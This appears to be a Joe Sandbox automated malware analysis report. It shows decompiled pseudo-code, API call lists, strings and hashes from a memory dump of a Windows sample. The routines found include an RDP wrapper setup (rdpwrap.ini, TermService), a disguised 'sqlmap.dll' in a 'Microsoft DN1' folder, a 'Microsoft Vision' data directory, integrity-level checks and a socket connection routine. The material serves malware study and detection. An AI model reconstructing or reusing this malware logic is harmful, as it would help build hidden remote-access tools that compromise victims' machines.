                                      					_t51 = 0x417cfc;
                                      					_t22 = E00402F9A( &_v8, 0x417cfc, _t65); // executed
                                      					_t62 = 0x417d00;
                                      					E004031FD(0x417d00, _t22); // executed
                                      					E004058FB(_v8);
                                      					E004030C5(0x417cfc, 0x417cfc, _t54); // executed
                                      				}
                                      				_t55 = L"\\Microsoft DN1";
                                      				E00403230(_t62, _t51, _t65, L"\\Microsoft DN1"); // executed
                                      				_t14 = E00403230(0x417cfc, _t51, _t65, _t55); // executed
                                      				E0040D4D0(_t14, _t62);
                                      				E004031FD(0x417d04, _t62); // executed
                                      				E00403230(0x417d04, _t51, _t65, L"\\rdpwrap.ini"); // executed
                                      				_t57 = L"\\sqlmap.dll";
                                      				E00403230(_t62, _t51, _t65, L"\\sqlmap.dll"); // executed
                                      				E00403230(0x417cfc, _t51, _t65, _t57); // executed
                                      				return 0x417cc8;
                                      			}














                                      0x0040c74b
                                      0x0040c74e
                                      0x0040c757
                                      0x0040c75f
                                      0x0040c760
                                      0x0040c763
                                      0x0040c76b
                                      0x0040c773
                                      0x0040c774
                                      0x0040c77b
                                      0x0040c781
                                      0x0040c788
                                      0x0040c78e
                                      0x0040c795
                                      0x0040c7a7
                                      0x0040c797
                                      0x0040c797
                                      0x0040c799
                                      0x0040c799
                                      0x0040c7a0
                                      0x0040c7a1
                                      0x0040c7a2
                                      0x0040c7a3
                                      0x0040c7a4
                                      0x0040c7a4
                                      0x0040c7a9
                                      0x0040c7b9
                                      0x0040c7bf
                                      0x0040c7c5
                                      0x0040c7ca
                                      0x0040c7d7
                                      0x0040c7dc
                                      0x0040c7e1
                                      0x0040c7e4
                                      0x0040c81b
                                      0x0040c820
                                      0x0040c825
                                      0x0040c82d
                                      0x0040c835
                                      0x0040c7e6
                                      0x0040c7ed
                                      0x0040c7f2
                                      0x0040c7f7
                                      0x0040c7fc
                                      0x0040c804
                                      0x0040c80c
                                      0x0040c814
                                      0x0040c814
                                      0x0040c83a
                                      0x0040c842
                                      0x0040c84a
                                      0x0040c851
                                      0x0040c85e
                                      0x0040c86a
                                      0x0040c86f
                                      0x0040c877
                                      0x0040c87f
                                      0x0040c88d

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00417CC8), ref: 0040C757
                                        • Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
                                        • Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3
                                        • Part of subcall function 00402F9A: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00402FCD
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                      • String ID: %ProgramFiles%$%ProgramW6432%$TermService$\Microsoft DN1$\rdpwrap.ini$\sqlmap.dll
                                      • API String ID: 2811233055-2974354589
                                      • Opcode ID: c00c295642618586e8b158804c4c16bd5fa2d59d97c082f640f566a4fa7c8735
                                      • Instruction ID: 73c3124989871fc7ef99486f1ca8238afbb50c074eb302be562dfbf628a52383
                                      • Opcode Fuzzy Hash: c00c295642618586e8b158804c4c16bd5fa2d59d97c082f640f566a4fa7c8735
                                      • Instruction Fuzzy Hash: 2431C131B1411467C7057F66AC529BF2A7E9BC5B15310803FB4026B2D2DF7C9A82479D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 84%
                                      			E00402AFF(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v56;
                                      				char _v320;
                                      				short _v840;
                                      				void* _t20;
                                      				void* _t24;
                                      				void* _t25;
                                      				void* _t26;
                                      				void* _t28;
                                      				void* _t30;
                                      				void* _t40;
                                      				void* _t47;
                                      				void* _t59;
                                      				void* _t60;
                                      				void* _t61;
                                      				void* _t63;
                                      
                                      				_t63 = __eflags;
                                      				_t60 = __edx;
                                      				_t59 = __ecx;
                                      				GetModuleFileNameA(0,  &_v320, 0x104);
                                      				_v16 = 0;
                                      				_t20 = E0040F5C8( &_v320,  &_v16); // executed
                                      				_v12 = 0;
                                      				E0040F2C7(_t20, _v16,  &_v12,  &_v12);
                                      				_pop(_t47);
                                      				_push(_v12);
                                      				E004033AB(_t61, 0x412428); // executed
                                      				_t49 = _t61; // executed
                                      				E0040D7A6(_t61); // executed
                                      				_t24 = E0040D780(_t61);
                                      				_t25 = E0040D724(); // executed
                                      				_t26 = E0040D56A();
                                      				E0040D7E0(_t61, _v16); // executed
                                      				_t28 = E00403E02( &_v56, _v16, _t63, _t61, _t61, _t49, 0xb8, _t26, _t25, _t24, _t61, _t47); // executed
                                      				E00404A3D(_t59, _t28); // executed
                                      				_t30 = E00403DD8( &_v56);
                                      				if( *((intOrPtr*)(_t60 + 0x34)) != 0) {
                                      					E00401052( &_v840, 0, 0x208);
                                      					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v840);
                                      					lstrcatW( &_v840, L"\\Microsoft Vision\\");
                                      					CreateDirectoryW( &_v840, 0); // executed
                                      					E00408431(_t59, 1); // executed
                                      					_v12 = 0x414784;
                                      					_t40 = E00404A3D(_t59,  &_v12); // executed
                                      					return _t40;
                                      				}
                                      				return _t30;
                                      			}




















                                      0x00402aff
                                      0x00402b1a
                                      0x00402b1c
                                      0x00402b1e
                                      0x00402b27
                                      0x00402b30
                                      0x00402b3f
                                      0x00402b42
                                      0x00402b48
                                      0x00402b49
                                      0x00402b54
                                      0x00402b5a
                                      0x00402b5c
                                      0x00402b61
                                      0x00402b67
                                      0x00402b6d
                                      0x00402b7d
                                      0x00402b86
                                      0x00402b8e
                                      0x00402b96
                                      0x00402b9e
                                      0x00402bad
                                      0x00402bc1
                                      0x00402bd3
                                      0x00402be1
                                      0x00402bea
                                      0x00402bf2
                                      0x00402bfc
                                      0x00000000
                                      0x00402bfc
                                      0x00402c05

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B1E
                                        • Part of subcall function 0040F5C8: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F5F5
                                        • Part of subcall function 0040F5C8: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00402B35), ref: 0040F600
                                        • Part of subcall function 0040F5C8: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040F611
                                        • Part of subcall function 0040F5C8: CloseHandle.KERNEL32(00000000), ref: 0040F618
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 0040D7A6: GetComputerNameW.KERNEL32(?,00000010), ref: 0040D7C9
                                        • Part of subcall function 0040D780: GetCurrentProcess.KERNEL32(?,?,00402B66,?,00412428,?,?), ref: 0040D784
                                        • Part of subcall function 0040D724: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0040D736
                                        • Part of subcall function 0040D724: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0040D73D
                                        • Part of subcall function 0040D724: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0040D75B
                                        • Part of subcall function 0040D724: CloseHandle.KERNEL32(00000000), ref: 0040D770
                                        • Part of subcall function 0040D56A: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D582
                                        • Part of subcall function 0040D56A: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D592
                                        • Part of subcall function 0040D7E0: RegOpenKeyExW.KERNEL32 ref: 0040D824
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402BC1
                                      • lstrcatW.KERNEL32 ref: 00402BD3
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00402BE1
                                        • Part of subcall function 00408431: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 0040843D
                                        • Part of subcall function 00408431: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 00408454
                                        • Part of subcall function 00408431: EnterCriticalSection.KERNEL32(004177C0,?,?,?,?,?,00402BEF,?,00000001), ref: 00408460
                                        • Part of subcall function 00408431: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00402BEF,?,00000001), ref: 00408470
                                        • Part of subcall function 00408431: LeaveCriticalSection.KERNEL32(004177C0), ref: 004084C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$HandleProcess$CloseCreateCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderInformationInitializeLeaveLibraryLoadPathProcReadSizelstrcatlstrcpy
                                      • String ID: \Microsoft Vision\$h$@
                                      • API String ID: 124308011-95466046
                                      • Opcode ID: 6c2ea5f1df32180b2cc7de1862a89e49b445567976ccfd72f65e3efbf6581580
                                      • Instruction ID: 5e107a4da3c907c550ed5c7b01739eb642fc80a80227b137f1cf39db7e775c70
                                      • Opcode Fuzzy Hash: 6c2ea5f1df32180b2cc7de1862a89e49b445567976ccfd72f65e3efbf6581580
                                      • Instruction Fuzzy Hash: A52162B1A002087BDB15FBA5DD86EEE776C9F44308F00447FB505F21C1EAB86A488B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 298 405294-4052e9 call 402eeb call 40dd97 getaddrinfo 303 405348 298->303 304 4052eb-405304 socket 298->304 306 40534a-405358 call 4058fb 303->306 304->303 305 405306-405343 htons freeaddrinfo connect 304->305 308 405345 305->308 309 40535b-40536a ReleaseMutex 305->309 308->303 309->306
                                      C-Code - Quality: 37%
                                      			E00405294(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				void _v40;
                                      				void* _t36;
                                      				signed int _t40;
                                      				signed int _t42;
                                      				void* _t44;
                                      				signed int _t47;
                                      				intOrPtr _t53;
                                      				intOrPtr _t54;
                                      				signed int* _t55;
                                      
                                      				_v8 = _v8 & 0x00000000;
                                      				_t44 = __ecx; // executed
                                      				E00402EEB(__ecx,  &_a4); // executed
                                      				 *((intOrPtr*)(_t44 + 4)) = _a8;
                                      				E0040DD97(_t44 + 0x1d8);
                                      				_t47 = 8;
                                      				memset( &_v40, 0, _t47 << 2);
                                      				_v28 = 6;
                                      				_t36 =  &_v40;
                                      				_t53 = 1;
                                      				_v32 = 1;
                                      				__imp__getaddrinfo(_a4, 0, _t36,  &_v8); // executed
                                      				if(_t36 != 0) {
                                      					L4:
                                      					_t53 = 0;
                                      				} else {
                                      					_t54 =  *((intOrPtr*)(_v8 + 0x18));
                                      					_t40 = 2;
                                      					__imp__#23(_t40, 1, 0); // executed
                                      					 *(_t44 + 0xc) = _t40;
                                      					if(_t40 == 0xffffffff) {
                                      						goto L4;
                                      					} else {
                                      						_t55 = _t44 + 0x1c8;
                                      						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
                                      						_t42 = 2;
                                      						 *_t55 = _t42;
                                      						__imp__#9(_a8);
                                      						 *(_t44 + 0x1ca) = _t42;
                                      						__imp__freeaddrinfo(_v8);
                                      						__imp__#4( *(_t44 + 0xc), _t55, 0x10); // executed
                                      						if(_t42 != 0xffffffff) {
                                      							 *((intOrPtr*)(_t44 + 8)) = 1;
                                      							ReleaseMutex( *(_t44 + 0x1d8));
                                      						} else {
                                      							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
                                      							goto L4;
                                      						}
                                      					}
                                      				}
                                      				E004058FB(_a4);
                                      				return _t53;
                                      			}















                                      0x0040529a
                                      0x004052a5
                                      0x004052a7
                                      0x004052b5
                                      0x004052b8
                                      0x004052bf
                                      0x004052c5
                                      0x004052ca
                                      0x004052d2
                                      0x004052dd
                                      0x004052de
                                      0x004052e1
                                      0x004052e9
                                      0x00405348
                                      0x00405348
                                      0x004052eb
                                      0x004052f3
                                      0x004052f6
                                      0x004052f8
                                      0x004052fe
                                      0x00405304
                                      0x00000000
                                      0x00405306
                                      0x00405309
                                      0x00405311
                                      0x00405317
                                      0x0040531b
                                      0x0040531e
                                      0x00405327
                                      0x0040532e
                                      0x0040533a
                                      0x00405343
                                      0x00405361
                                      0x00405364
                                      0x00405345
                                      0x00405345
                                      0x00000000
                                      0x00405345
                                      0x00405343
                                      0x00405304
                                      0x0040534d
                                      0x00405358

                                      APIs
                                        • Part of subcall function 00402EEB: lstrcatA.KERNEL32(00000000,?,?,00000000,?,0040338A,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00402F17
                                        • Part of subcall function 0040DD97: WaitForSingleObject.KERNEL32(?,000000FF,004052BD,?,?,?,00000000,004049B2,?,?,?,?,?), ref: 0040DD9B
                                      • getaddrinfo.WS2_32(?,00000000,004049B2,00000000), ref: 004052E1
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 004052F8
                                      • htons.WS2_32(?), ref: 0040531E
                                      • freeaddrinfo.WS2_32(00000000), ref: 0040532E
                                      • connect.WS2_32(?,?,00000010), ref: 0040533A
                                      • ReleaseMutex.KERNEL32(?), ref: 00405364
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                      • String ID:
                                      • API String ID: 2516106447-0
                                      • Opcode ID: 923dc3b2e14cf5ab7a56870233bd30a359ff79c3679890ae838977fd83e5dac2
                                      • Instruction ID: 6b31b230f32404f8442b0296e7e7382ea5fa347a85132987204c129c8f995715
                                      • Opcode Fuzzy Hash: 923dc3b2e14cf5ab7a56870233bd30a359ff79c3679890ae838977fd83e5dac2
                                      • Instruction Fuzzy Hash: FA217E31A00204ABDF10DFA1CC84ADEBBB8EF44310F108066ED05EB1A1C7B59A51DF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00408431(intOrPtr _a4, intOrPtr _a8) {
                                      				void _v28;
                                      				void* _t13;
                                      				signed int _t14;
                                      
                                      				InitializeCriticalSection( &_v28);
                                      				_t14 = 6;
                                      				DeleteCriticalSection(memcpy(0x4177c0,  &_v28, _t14 << 2));
                                      				EnterCriticalSection(0x4177c0);
                                      				 *0x4177e8 = _a4;
                                      				GetModuleHandleA(0);
                                      				 *0x4166ac = 0x416d98;
                                      				if(_a8 == 0) {
                                      					E00401EB9(0x41780c);
                                      					 *0x416d98 = 1;
                                      					_t13 = E00401E8E(0x417804, E004080AA, 0x416d98);
                                      				} else {
                                      					_t13 = E00401E8E(0x41780c, E00407376, 0x416d98); // executed
                                      					 *0x4177ac = 1;
                                      				}
                                      				LeaveCriticalSection(0x4177c0);
                                      				return _t13;
                                      			}






                                      0x0040843d
                                      0x00408445
                                      0x00408454
                                      0x00408460
                                      0x0040846b
                                      0x00408470
                                      0x0040847f
                                      0x0040848a
                                      0x004084a3
                                      0x004084b3
                                      0x004084bd
                                      0x0040848c
                                      0x00408492
                                      0x00408497
                                      0x00408497
                                      0x004084c3
                                      0x004084cc

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 0040843D
                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 00408454
                                      • EnterCriticalSection.KERNEL32(004177C0,?,?,?,?,?,00402BEF,?,00000001), ref: 00408460
                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00402BEF,?,00000001), ref: 00408470
                                      • LeaveCriticalSection.KERNEL32(004177C0), ref: 004084C3
                                        • Part of subcall function 00401E8E: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401EA3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                      • String ID:
                                      • API String ID: 2964645253-0
                                      • Opcode ID: 3361ec2705fb206e063114806a935c0344e12ffb39e03853e8c577b0464dc2c5
                                      • Instruction ID: 2d2841456ea70906bd5f85986132460682fd0c923a575534e8b6154dd4be7def
                                      • Opcode Fuzzy Hash: 3361ec2705fb206e063114806a935c0344e12ffb39e03853e8c577b0464dc2c5
                                      • Instruction Fuzzy Hash: 04014071A04205ABC700AF55DD4EBDF3B78EB45714F01803AFA09A62D0CBB89485CBE9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 66%
                                      			E00410C39(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v8;
                                      				char _v28;
                                      				char _v32;
                                      				short _v552;
                                      				void* _t34;
                                      
                                      				_t34 = __edx;
                                      				_v8 = 0;
                                      				E00401052( &_v552, 0, 0x208);
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
                                      				lstrcatW( &_v552, L"\\Microsoft Vision\\");
                                      				E00403230( &_v8, _t34, 0,  &_v552); // executed
                                      				_v32 = 0x3b;
                                      				asm("xorps xmm0, xmm0");
                                      				_v28 = 0;
                                      				asm("movups [ebp-0x14], xmm0");
                                      				E0040343F(E00403527( &_v32, _t34,  &_v8), 0, _a4);
                                      				E0040342B( &_v32);
                                      				E004058FB(_v8);
                                      				return _a4;
                                      			}








                                      0x00410c39
                                      0x00410c52
                                      0x00410c55
                                      0x00410c69
                                      0x00410c7b
                                      0x00410c8b
                                      0x00410c96
                                      0x00410c9d
                                      0x00410ca0
                                      0x00410ca7
                                      0x00410cb2
                                      0x00410cba
                                      0x00410cc2
                                      0x00410ccc

                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00410C69
                                      • lstrcatW.KERNEL32 ref: 00410C7B
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderFreePathVirtuallstrcat
                                      • String ID: ;$\Microsoft Vision\
                                      • API String ID: 1529938272-253167065
                                      • Opcode ID: 671af2f9eab6c763be752264ea81ad865cbfc2137a26b04bf5b2011f3fdc0044
                                      • Instruction ID: 6685fcf80b4406b8bbd98487c845a56216651f42fbaf94eb2e3c560c049c9310
                                      • Opcode Fuzzy Hash: 671af2f9eab6c763be752264ea81ad865cbfc2137a26b04bf5b2011f3fdc0044
                                      • Instruction Fuzzy Hash: 76013C71C00119AACB11EFA1ED49DDFBB7CAF18304F00416AB505B2091EB78AB45CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 394 405738-40574b GetCommandLineA 395 405775-405777 394->395 396 40574d-405752 394->396 397 405772-405773 395->397 398 405779 395->398 399 405754 396->399 400 405765-405770 396->400 397->395 402 405782-405784 398->402 403 405756-40575a 399->403 401 405780 400->401 401->402 404 405786-4057b2 GetStartupInfoA call 4057c6 call 4057f3 GetModuleHandleA call 410a7c 402->404 405 40577b-40577d 402->405 403->400 406 40575c-405763 403->406 413 4057b7-4057bf call 4057db ExitProcess 404->413 405->404 407 40577f 405->407 406->400 406->403 407->401
                                      C-Code - Quality: 100%
                                      			_entry_() {
                                      				struct _STARTUPINFOA _v72;
                                      				intOrPtr _t6;
                                      				int _t11;
                                      				intOrPtr _t15;
                                      				intOrPtr* _t16;
                                      				intOrPtr* _t18;
                                      				intOrPtr _t20;
                                      				void* _t21;
                                      
                                      				_t16 = GetCommandLineA();
                                      				_t6 =  *_t16;
                                      				if(_t6 != 0x22) {
                                      					while(1) {
                                      						__eflags = _t6 - 0x20;
                                      						if(_t6 <= 0x20) {
                                      							break;
                                      						}
                                      						_t16 = _t16 + 1;
                                      						__eflags = _t16;
                                      						_t6 =  *_t16;
                                      					}
                                      					L12:
                                      					if(_t6 != 0) {
                                      						__eflags = _t6 - 0x20;
                                      						if(_t6 > 0x20) {
                                      							goto L13;
                                      						}
                                      						_t16 = _t16 + 1;
                                      						__eflags = _t16;
                                      						L11:
                                      						_t6 =  *_t16;
                                      						goto L12;
                                      					}
                                      					L13:
                                      					_t2 =  &(_v72.dwFlags);
                                      					_v72.dwFlags = _v72.dwFlags & 0x00000000;
                                      					GetStartupInfoA( &_v72);
                                      					E004057C6();
                                      					E004057F3(0x416000, 0x41602c);
                                      					GetModuleHandleA(0);
                                      					_t11 = E00410A7C(0x41602c, _t21,  *_t2, 0x416000, 0x416000); // executed
                                      					E004057DB();
                                      					ExitProcess(_t11);
                                      				}
                                      				_t18 = _t16 + 1;
                                      				_t20 =  *_t18;
                                      				if(_t20 == 0) {
                                      					L5:
                                      					_t1 = _t18 + 1; // 0x3
                                      					_t14 =  !=  ? _t18 : _t1;
                                      					_t16 =  !=  ? _t18 : _t1;
                                      					goto L11;
                                      				}
                                      				_t15 = _t20;
                                      				while(1) {
                                      					_t20 = _t15;
                                      					if(_t15 == 0x22) {
                                      						goto L5;
                                      					}
                                      					_t18 = _t18 + 1;
                                      					_t20 =  *_t18;
                                      					_t15 = _t20;
                                      					if(_t20 != 0) {
                                      						continue;
                                      					}
                                      					goto L5;
                                      				}
                                      				goto L5;
                                      			}











                                      0x00405745
                                      0x00405747
                                      0x0040574b
                                      0x00405775
                                      0x00405775
                                      0x00405777
                                      0x00000000
                                      0x00000000
                                      0x00405772
                                      0x00405772
                                      0x00405773
                                      0x00405773
                                      0x00405782
                                      0x00405784
                                      0x0040577b
                                      0x0040577d
                                      0x00000000
                                      0x00000000
                                      0x0040577f
                                      0x0040577f
                                      0x00405780
                                      0x00405780
                                      0x00000000
                                      0x00405780
                                      0x00405786
                                      0x00405786
                                      0x00405786
                                      0x0040578e
                                      0x00405794
                                      0x004057a3
                                      0x004057aa
                                      0x004057b2
                                      0x004057b9
                                      0x004057bf
                                      0x004057bf
                                      0x0040574d
                                      0x0040574e
                                      0x00405752
                                      0x00405765
                                      0x00405765
                                      0x0040576b
                                      0x0040576e
                                      0x00000000
                                      0x0040576e
                                      0x00405754
                                      0x00405756
                                      0x00405756
                                      0x0040575a
                                      0x00000000
                                      0x00000000
                                      0x0040575c
                                      0x0040575d
                                      0x0040575f
                                      0x00405763
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405763
                                      0x00000000

                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 0040573F
                                      • GetStartupInfoA.KERNEL32 ref: 0040578E
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004057AA
                                      • ExitProcess.KERNEL32 ref: 004057BF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                      • String ID:
                                      • API String ID: 2164999147-0
                                      • Opcode ID: b54e49e6b1be417e56fdc4c920da3e00334b25d2d339193ffcc2689d20b6eccd
                                      • Instruction ID: 6c2cde08bac8e1cfe51f4b79fa0261da6436e6723f3ca5280809e9b0f5d84409
                                      • Opcode Fuzzy Hash: b54e49e6b1be417e56fdc4c920da3e00334b25d2d339193ffcc2689d20b6eccd
                                      • Instruction Fuzzy Hash: C30126384446059FC7246B74A4866FB3F96EF0A308F64107EE581E7392D63E4C4BAE1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 88%
                                      			E0040F5C8(CHAR* __ecx, long* __edx) {
                                      				long _v8;
                                      				void* _t5;
                                      				long _t6;
                                      				void* _t11;
                                      				long* _t18;
                                      				void* _t22;
                                      
                                      				_push(__ecx);
                                      				_t18 = __edx;
                                      				_t11 = E004010AD(0x400000);
                                      				_v8 = 0;
                                      				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                      				_t22 = _t5;
                                      				_t6 = GetFileSize(_t22, 0);
                                      				 *_t18 = _t6;
                                      				ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
                                      				CloseHandle(_t22); // executed
                                      				return _t11;
                                      			}









                                      0x0040f5cb
                                      0x0040f5d4
                                      0x0040f5de
                                      0x0040f5f2
                                      0x0040f5f5
                                      0x0040f5fb
                                      0x0040f600
                                      0x0040f60b
                                      0x0040f611
                                      0x0040f618
                                      0x0040f624

                                      APIs
                                        • Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
                                        • Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA
                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F5F5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00402B35), ref: 0040F600
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040F611
                                      • CloseHandle.KERNEL32(00000000), ref: 0040F618
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                      • String ID:
                                      • API String ID: 2517252058-0
                                      • Opcode ID: 7a2ffbd97ecdeb6ab384a92e8b9be7296810692c199c72bd8959b4056ca9af23
                                      • Instruction ID: 44e20b48cd2725d3dbedd8bfa1308a904f45e9990ff034d85ea13025c03292e5
                                      • Opcode Fuzzy Hash: 7a2ffbd97ecdeb6ab384a92e8b9be7296810692c199c72bd8959b4056ca9af23
                                      • Instruction Fuzzy Hash: 1BF05EB2641214BFF3159B65AD09FFB7A9CEB49614F10413AFA01E2180EAF45E1087B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 419 40d724-40d745 GetCurrentProcess OpenProcessToken 420 40d767-40d76b 419->420 421 40d747-40d763 GetTokenInformation 419->421 422 40d776-40d77f 420->422 423 40d76d-40d770 CloseHandle 420->423 421->420 423->422
                                      C-Code - Quality: 100%
                                      			E0040D724() {
                                      				void* _v8;
                                      				long _v12;
                                      				void _v16;
                                      				long _t21;
                                      				void* _t22;
                                      
                                      				_t22 = 0;
                                      				_v8 = 0;
                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                      					_t21 = 4;
                                      					_v12 = _t21;
                                      					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
                                      					_t22 =  !=  ? _v16 : 0;
                                      				}
                                      				if(_v8 != 0) {
                                      					CloseHandle(_v8); // executed
                                      				}
                                      				return 0 | _t22 != 0x00000000;
                                      			}








                                      0x0040d72e
                                      0x0040d733
                                      0x0040d745
                                      0x0040d749
                                      0x0040d74d
                                      0x0040d75b
                                      0x0040d763
                                      0x0040d763
                                      0x0040d76b
                                      0x0040d770
                                      0x0040d770
                                      0x0040d77f

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0040D736
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0040D73D
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0040D75B
                                      • CloseHandle.KERNEL32(00000000), ref: 0040D770
                                      Memory Dump Source
